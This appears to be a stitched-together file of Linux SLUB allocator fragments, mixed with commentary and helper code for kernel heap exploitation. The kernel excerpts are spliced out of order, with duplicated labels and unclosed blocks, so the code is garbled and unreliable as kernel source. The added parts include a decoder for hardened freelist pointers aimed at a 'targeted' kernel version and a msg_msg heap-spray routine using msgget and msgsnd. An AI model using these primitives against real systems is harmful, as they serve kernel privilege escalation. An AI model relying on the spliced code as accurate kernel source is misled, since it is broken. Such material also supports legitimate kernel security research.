struct kmem_cache {
#ifndef CONFIG_SLUB_TINY
	struct kmem_cache_cpu __percpu *cpu_slab;
#endif
	/* Used for retrieving partial slabs, etc. */
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;		/* The size of an object including metadata */
	unsigned int object_size;	/* The size of an object without metadata */
	struct reciprocal_value reciprocal_size;
	unsigned int offset;		/* Free pointer offset */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	/* Number of per cpu partial objects to keep around */
	unsigned int cpu_partial;
	/* Number of per cpu partial slabs to keep around */
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects min;
	gfp_t allocflags;		/* gfp flags to use on each alloc */
	int refcount;			/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	unsigned int inuse;		/* Offset to metadata */
	unsigned int align;		/* Alignment */
	unsigned int red_left_pad;	/* Left redzone padding size */
	const char *name;		/* Name (only for display!) */
	struct list_head list;		/* List of slab caches */
#ifdef CONFIG_SYSFS
	struct kobject kobj;		/* For sysfs */
#endif
#ifdef CONFIG_SLAB_FREELIST_HARDENED
	unsigned long random;
#endif

#ifdef CONFIG_NUMA
	/*
	 * Defragmentation by allocating from a remote node.
	 */
	unsigned int remote_node_defrag_ratio;
#endif
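The `offset` and `random` fields above are what drive freelist walks: every free object stores a pointer to the next free object at `offset` bytes into itself, and with CONFIG_SLAB_FREELIST_HARDENED that stored value is obfuscated with the per-cache `random` key. Below is a minimal userspace sketch of the idea; the helper names are mine, and the exact mixing formula should be treated as an assumption that may differ between kernel versions.

#include <stdint.h>
#include <byteswap.h>

/*
 * Simplified model of SLUB's hardened free pointer encoding
 * (CONFIG_SLAB_FREELIST_HARDENED). Recent kernels mix the stored
 * pointer with the per-cache s->random key and the byte-swapped
 * address the pointer lives at; treat the exact formula as an
 * assumption for the kernel version you are targeting.
 */
static inline uint64_t encode_freelist_ptr(uint64_t next_free,
					   uint64_t stored_at,
					   uint64_t cache_random)
{
	return next_free ^ cache_random ^ bswap_64(stored_at);
}

static inline uint64_t decode_freelist_ptr(uint64_t stored_val,
					   uint64_t stored_at,
					   uint64_t cache_random)
{
	/* XOR is its own inverse, so decoding is the same operation. */
	return stored_val ^ cache_random ^ bswap_64(stored_at);
}

/*
 * Conceptually, get_freepointer(s, object) then amounts to roughly:
 *   decode_freelist_ptr(*(uint64_t *)(object + s->offset),
 *                       object + s->offset, s->random);
 */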
out:
	/*
	 * When init equals 'true', like for kzalloc() family, only
	 * @orig_size bytes might be zeroed instead of s->object_size
	 */
	slab_post_alloc_hook(s, objcg, gfpflags, 1, &object, init, orig_size);
#ifdef CONFIG_PREEMPT_COUNT
	/*
	 * We may have been preempted and rescheduled on a different
	 * cpu before disabling preemption. Need to reload cpu area
	 * pointer.
	 */
	c = slub_get_cpu_ptr(s->cpu_slab);
#endif
	slab = READ_ONCE(c->slab);
	if (!slab) {
		/*
		 * if the node is not online or has no normal memory, just
		 * ignore the node constraint
		 */
		if (unlikely(node != NUMA_NO_NODE &&
			     !node_isset(node, slab_nodes)))
			node = NUMA_NO_NODE;
		goto new_slab;
	}
redo:
	if (unlikely(!node_match(slab, node))) {
		/*
		 * same as above but node_match() being false already
		 * implies node != NUMA_NO_NODE
		 */
		if (!node_isset(node, slab_nodes)) {
			node = NUMA_NO_NODE;
		} else {
			stat(s, ALLOC_NODE_MISMATCH);
			goto deactivate_slab;
		}
	}
	/*
	 * By rights, we should be searching for a slab page that was
	 * PFMEMALLOC but right now, we are losing the pfmemalloc
	 * information when the page leaves the per-cpu allocator
	 */
	if (unlikely(!pfmemalloc_match(slab, gfpflags)))
		goto deactivate_slab;
	/* must check again c->slab in case we got preempted and it changed */
	local_lock_irqsave(&s->cpu_slab->lock, flags);
	if (unlikely(slab != c->slab)) {
		local_unlock_irqrestore(&s->cpu_slab->lock, flags);
		goto reread_slab;
	}
	freelist = c->freelist;
	if (freelist)
		goto load_freelist;
	/*
	 * freelist is pointing to the list of objects to be used.
	 * slab is pointing to the slab from which the objects are obtained.
	 * That slab must be frozen for per cpu allocations to work.
	 */
	VM_BUG_ON(!c->slab->frozen);
	c->freelist = get_freepointer(s, freelist);
	c->tid = next_tid(c->tid);
	local_unlock_irqrestore(&s->cpu_slab->lock, flags);
	return freelist;
	if (slub_percpu_partial(c)) {
		local_lock_irqsave(&s->cpu_slab->lock, flags);
		if (unlikely(c->slab)) {
			local_unlock_irqrestore(&s->cpu_slab->lock, flags);
			goto reread_slab;
		}
		if (unlikely(!slub_percpu_partial(c))) {
			local_unlock_irqrestore(&s->cpu_slab->lock, flags);
			/* we were preempted and partial list got empty */
			goto new_objects;
		}
	slub_put_cpu_ptr(s->cpu_slab);
	slab = new_slab(s, gfpflags, node);
	c = slub_get_cpu_ptr(s->cpu_slab);
	if (unlikely(!slab)) {
		slab_out_of_memory(s, gfpflags, node);
		return NULL;
	}
stat(s, ALLOC_SLAB);
	if (kmem_cache_debug(s)) {
		freelist = alloc_single_from_new_slab(s, slab, orig_size);

		if (unlikely(!freelist))
			goto new_objects;

		if (s->flags & SLAB_STORE_USER)
			set_track(s, freelist, TRACK_ALLOC, addr);

		return freelist;
	}
	/*
	 * No other reference to the slab yet so we can
	 * muck around with it freely without cmpxchg
	 */
	freelist = slab->freelist;
	slab->freelist = NULL;
	slab->inuse = slab->objects;
	slab->frozen = 1;
inc_slabs_node(s, slab_nid(slab), slab->objects);
check_new_slab:
	if (kmem_cache_debug(s)) {
		/*
		 * For debug caches here we had to go through
		 * alloc_single_from_partial() so just store the tracking info
		 * and return the object
		 */
		if (s->flags & SLAB_STORE_USER)
			set_track(s, freelist, TRACK_ALLOC, addr);

		return freelist;
	}
	if (unlikely(!pfmemalloc_match(slab, gfpflags))) {
		/*
		 * For !pfmemalloc_match() case we don't load freelist so that
		 * we don't make further mismatched allocations easier.
		 */
		deactivate_slab(s, slab, get_freepointer(s, freelist));
		return freelist;
	}
	if (slab->freelist) {
		stat(s, DEACTIVATE_REMOTE_FREES);
		tail = DEACTIVATE_TO_TAIL;
	}

	/*
	 * Stage one: Count the objects on cpu's freelist as free_delta and
	 * remember the last object in freelist_tail for later splicing.
	 */
	freelist_tail = NULL;
	freelist_iter = freelist;
	while (freelist_iter) {
		nextfree = get_freepointer(s, freelist_iter);

		/*
		 * If 'nextfree' is invalid, it is possible that the object at
		 * 'freelist_iter' is already corrupted. So isolate all objects
		 * starting at 'freelist_iter' by skipping them.
		 */
		if (freelist_corrupted(s, slab, &freelist_iter, nextfree))
			break;

		freelist_tail = freelist_iter;
		free_delta++;

		freelist_iter = nextfree;
	}
	/*
	 * Stage two: Unfreeze the slab while splicing the per-cpu
	 * freelist to the head of slab's freelist.
	 *
	 * Ensure that the slab is unfrozen while the list presence
	 * reflects the actual number of objects during unfreeze.
	 *
	 * We first perform cmpxchg holding lock and insert to list
	 * when it succeed. If there is mismatch then the slab is not
	 * unfrozen and number of objects in the slab may have changed.
	 * Then release lock and retry cmpxchg again.
	 */
redo:

	/* Determine target state of the slab */
	new.counters = old.counters;
	if (freelist_tail) {
		new.inuse -= free_delta;
		set_freepointer(s, freelist_tail, old.freelist);
		new.freelist = freelist;
	} else
		new.freelist = old.freelist;

	new.frozen = 0;

	if (!new.inuse && n->nr_partial >= s->min_partial) {
		mode = M_FREE;
	} else if (new.freelist) {
		mode = M_PARTIAL;
		/*
		 * Taking the spinlock removes the possibility that
		 * acquire_slab() will see a slab that is frozen
		 */
		spin_lock_irqsave(&n->list_lock, flags);
	} else {
		mode = M_FULL_NOLIST;
	}

	if (!slab_update_freelist(s, slab,
				old.freelist, old.counters,
				new.freelist, new.counters,
				"unfreezing slab")) {
		if (mode == M_PARTIAL)
			spin_unlock_irqrestore(&n->list_lock, flags);
		goto redo;
	}
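Stripped of the frozen/inuse bookkeeping and the cmpxchg, stage one and stage two above are just "count a singly linked list, then splice it onto the head of another one". A self-contained sketch of that core operation on plain nodes (names are mine, and the encoded free-pointer format is ignored):

#include <stddef.h>

struct obj {
	struct obj *next;	/* stands in for the (encoded) free pointer */
};

/*
 * Count the objects on 'cpu_freelist', then splice the whole chain
 * onto the head of '*slab_freelist'. The return value mirrors
 * free_delta in deactivate_slab().
 */
static size_t splice_freelist(struct obj *cpu_freelist,
			      struct obj **slab_freelist)
{
	struct obj *iter = cpu_freelist, *tail = NULL;
	size_t free_delta = 0;

	/* Stage one: walk to the tail while counting. */
	while (iter) {
		tail = iter;
		free_delta++;
		iter = iter->next;
	}

	/* Stage two: hook the old slab freelist behind our tail. */
	if (tail) {
		tail->next = *slab_freelist;
		*slab_freelist = cpu_freelist;
	}
	return free_delta;
}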
redo:
	/*
	 * Determine the currently cpus per cpu slab.
	 * The cpu may change afterward. However that does not matter since
	 * data is retrieved via this pointer. If we are on the same cpu
	 * during the cmpxchg then the free will succeed.
	 */
	c = raw_cpu_ptr(s->cpu_slab);
	tid = READ_ONCE(c->tid);

	/* Same with comment on barrier() in slab_alloc_node() */
	barrier();

	if (USE_LOCKLESS_FAST_PATH()) {
		freelist = READ_ONCE(c->freelist);

		set_freepointer(s, tail_obj, freelist);

		if (unlikely(!__update_cpu_freelist_fast(s, freelist, head, tid))) {
			note_cmpxchg_failure("slab_free", s, tid);
			goto redo;
		}
	} else {
		/* Update the free list under the local lock */
		local_lock(&s->cpu_slab->lock);
		c = this_cpu_ptr(s->cpu_slab);
		if (unlikely(slab != c->slab)) {
			local_unlock(&s->cpu_slab->lock);
			goto redo;
		}
		tid = c->tid;
		freelist = c->freelist;
	do {
		if (unlikely(n)) {
			spin_unlock_irqrestore(&n->list_lock, flags);
			n = NULL;
		}
		prior = slab->freelist;
		counters = slab->counters;
		set_freepointer(s, tail, prior);
		new.counters = counters;
		was_frozen = new.frozen;
		new.inuse -= cnt;
		if ((!new.inuse || !prior) && !was_frozen) {

			if (kmem_cache_has_cpu_partial(s) && !prior) {

				/*
				 * Slab was on no list before and will be
				 * partially empty
				 * We can defer the list move and instead
				 * freeze it.
				 */
				new.frozen = 1;

			} else { /* Needs to be taken off a list */

				n = get_node(s, slab_nid(slab));
				/*
				 * Speculatively acquire the list_lock.
				 * If the cmpxchg does not succeed then we may
				 * drop the list_lock without any processing.
				 *
				 * Otherwise the list_lock will synchronize with
				 * other processors updating the list of slabs.
				 */
				spin_lock_irqsave(&n->list_lock, flags);

			}
		}
} while (!slab_update_freelist(s, slab, prior, counters, head, new.counters, "__slab_free"));
if (likely(!n)) {
		if (likely(was_frozen)) {
			/*
			 * The list lock was not taken therefore no list
			 * activity can be necessary.
			 */
			stat(s, FREE_FROZEN);
		} else if (new.frozen) {
			/*
			 * If we just froze the slab then put it onto the
			 * per cpu partial list.
			 */
			put_cpu_partial(s, slab, 1);
			stat(s, CPU_PARTIAL_FREE);
		}

		return;
	}
	if (unlikely(!new.inuse && n->nr_partial >= s->min_partial))
		goto slab_empty;
	/*
	 * Objects left in the slab. If it was not on the partial list before
	 * then add it.
	 */
	if (!kmem_cache_has_cpu_partial(s) && unlikely(!prior)) {
		remove_full(s, n, slab);
		add_partial(n, slab, DEACTIVATE_TO_TAIL);
		stat(s, FREE_ADD_PARTIAL);
	}
	spin_unlock_irqrestore(&n->list_lock, flags);
	return;
slab_empty:
	if (prior) {
		/*
		 * Slab on the partial list.
		 */
		remove_partial(n, slab);
		stat(s, FREE_REMOVE_PARTIAL);
	} else {
		/* Slab must be on the full list */
		remove_full(s, n, slab);
	}
	for (int i = 0; i < 0x1000; i++) {
		if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0) {
			printf("[x] FAILED to get %d msg_queue!\n", i);
			perror("FAILED to get msg_queue");
			exit(EXIT_FAILURE);
		}
	}
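Creating the queues is only half of a typical msg_msg spray; the kernel allocations happen when messages are actually sent. A hedged sketch of the follow-up spray is below; the helper name, the payload size, and the assumption that a message of N bytes is backed by a kmalloc allocation of roughly N plus a ~0x30-byte struct msg_msg header (common x86_64 builds) are mine, not taken from the excerpt above.

#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define SPRAY_MSG_SIZE 0x40	/* hypothetical payload size; pick it to hit the target kmalloc cache */

struct spray_msg {
	long mtype;
	char mtext[SPRAY_MSG_SIZE];
};

/* Send one message per queue created by the msgget() loop above. */
static void spray_msg_queues(int *msqid, int count)
{
	struct spray_msg msg = { .mtype = 1 };

	memset(msg.mtext, 'A', sizeof(msg.mtext));
	for (int i = 0; i < count; i++) {
		/* IPC_NOWAIT: fail fast instead of blocking if a queue is full. */
		if (msgsnd(msqid[i], &msg, sizeof(msg.mtext), IPC_NOWAIT) < 0)
			perror("msgsnd");
	}
}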